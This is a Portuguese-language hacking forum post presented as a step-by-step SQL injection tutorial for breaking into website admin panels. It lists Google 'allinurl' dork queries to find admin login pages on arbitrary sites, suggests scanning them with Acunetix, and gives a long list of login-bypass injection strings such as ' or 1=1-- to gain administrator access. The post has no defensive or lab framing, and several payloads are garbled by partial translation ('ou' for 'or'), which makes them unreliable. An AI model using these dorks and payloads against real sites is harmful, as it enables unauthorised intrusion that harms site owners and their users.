Você não está conectado. Conecte-se ou registre-se

[Tutorial] Aprendendo Sql Injection passo a passo

Ver o tópico anterior Ver o tópico seguinte Ir em baixo  Mensagem [Página 1 de 1]

dr olk


Admin
Bom galera vou explicar sql injection metodo de inserção de strings no servidor
assim liberando os cookies e consequantemente a permissao de adiministrador
bem devido a algums erros em banco de dados dos servidores
é possivel ainda hj encontrar esse tipo de vulnerabilidade
sql injection vem de injeção de sql ou seja strings em logins e campos de senhas
depedendo da pagina vulneravel
um aliado constante dessa vulnerabilidade é o site [Você precisa estar registrado e conectado para ver este link.]
que permite pesquisar por paginas visadas a campos de logins
isso nao significa que essas paginas já estejam vulneraveis ok.
para pesquisarmos no google precisamo de um comando chamado allinurl.
esse comando procura especificadamente aquilo que se vem depois dos dois pontos
exemplo: allinurl:/site/admin/
com esse codigo ele caçará paginas com campos de logins de adiministraçoes.
abaixo uma lista com algums codigos para vc pesquisar no google.

Citação:
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/

allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp


pegue uma das strings acima e pesquise a vontade:
após isso saira uma lista de sites com paginas com campos de logins e senhas
ate ai tudo bem agora vamos escaniialos usando um scanner como acutinex
depois de scanniado e acuzando a suposta vulnerabilidade de sql injection

é só testarmos strings nos campos de loginsda pagina afetada.

Citação:
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi") ou ("a"="a
' or 'x'='x
0

Ver perfil do usuário http://forumyakuza.ativoforum.com

Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo  Mensagem [Página 1 de 1]

Permissão deste fórum:
Você não pode responder aos tópicos neste fórum